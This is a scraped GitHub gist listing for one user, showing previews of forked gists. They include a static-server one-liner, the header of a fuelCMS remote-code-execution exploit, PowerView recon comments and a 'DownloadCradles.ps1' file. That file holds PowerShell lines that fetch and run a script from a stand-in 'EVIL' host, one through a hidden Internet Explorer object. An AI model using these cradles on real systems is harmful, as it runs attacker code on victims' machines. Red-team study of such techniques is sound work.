Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
Akintunde Oyelakin cyberhawk01
cyberhawk01
/ DownloadCradles.ps1
Created
June 16, 2025 12:41
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
cyberhawk01
/ fuel-cms.py
Created
March 16, 2025 12:09
— forked from anir0y/fuel-cms.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # Exploit Title: fuelCMS 1.4.1 - Remote Code Execution | |
| # Date: 2019-07-19 | |
| # Exploit Author: 0xd0ff9 | |
| # Vendor Homepage: https://www.getfuelcms.com/ | |
| # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 | |
| # Version: <= 1.4.1 | |
| # Tested on: Ubuntu - Apache2 - php5 | |
| # CVE : CVE-2018-16763 |
cyberhawk01
/ PowerView-3.0-tricks.ps1
Created
March 9, 2025 10:53
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
cyberhawk01
/ web-servers.md
Created
June 13, 2024 14:37
— forked from willurd/web-servers.md
Big list of http static server one-liners